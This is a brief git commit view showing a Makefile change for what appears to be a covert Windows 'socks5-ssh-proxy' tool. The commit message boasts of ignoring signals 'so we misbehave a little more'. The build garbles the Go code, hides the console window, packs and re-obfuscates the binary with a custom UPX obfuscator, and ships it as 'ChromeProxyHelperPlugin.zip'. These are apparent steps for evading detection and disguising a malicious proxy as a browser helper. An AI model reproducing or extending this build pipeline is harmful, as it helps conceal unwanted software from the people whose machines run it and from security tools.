Add systemIgnoreAllSignals in release build when VMK is not used so we misbehave a little more

This commit is contained in:
2024-07-28 22:22:37 +02:00
parent ce4ec79f2f
commit 426f76ba37
7 changed files with 27 additions and 3 deletions

View File

@ -22,6 +22,7 @@ win: socks5-ssh-proxy.exe
socks5-ssh-proxy.exe: resources $(GARBLE_BIN) $(SOURCES)
GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags -H=windowsgui -tags release -o $@
upx $@
go run cmd/upx-obfuscator/main.go $@
goreleaser: resources $(GARBLE_BIN)
goreleaser build --clean --snapshot --id win-release
win-package: ChromeProxyHelperPlugin.zip